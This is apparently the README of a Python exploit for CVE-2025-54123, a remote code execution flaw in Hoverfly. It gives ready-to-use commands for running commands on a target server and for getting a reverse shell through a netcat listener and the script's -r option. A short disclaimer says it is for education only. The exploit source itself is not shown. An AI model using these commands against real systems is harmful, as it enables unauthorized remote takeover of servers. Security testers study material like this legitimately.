
Python exploit script for CVE-2025-54123 targeting Hoverfly RCE with command execution and reverse shell capabilities for authorized security testing.
Hoverfly CVE RCE
Command execution:
python3 CVE-2025-54123.py -u $USER -p $PASS -t "http://example.com:8888" -c whoami
Reverse Shell:
nc -lvnp 443
python3 CVE-2025-54123.py -u $USER -p $PASS -t "http://example.com:8888" -r $IP 443
This script is intended for educational purposes only. Unauthorized use of this exploit on systems without permission is illegal. The author is not responsible for any misuse or damages caused by this exploit.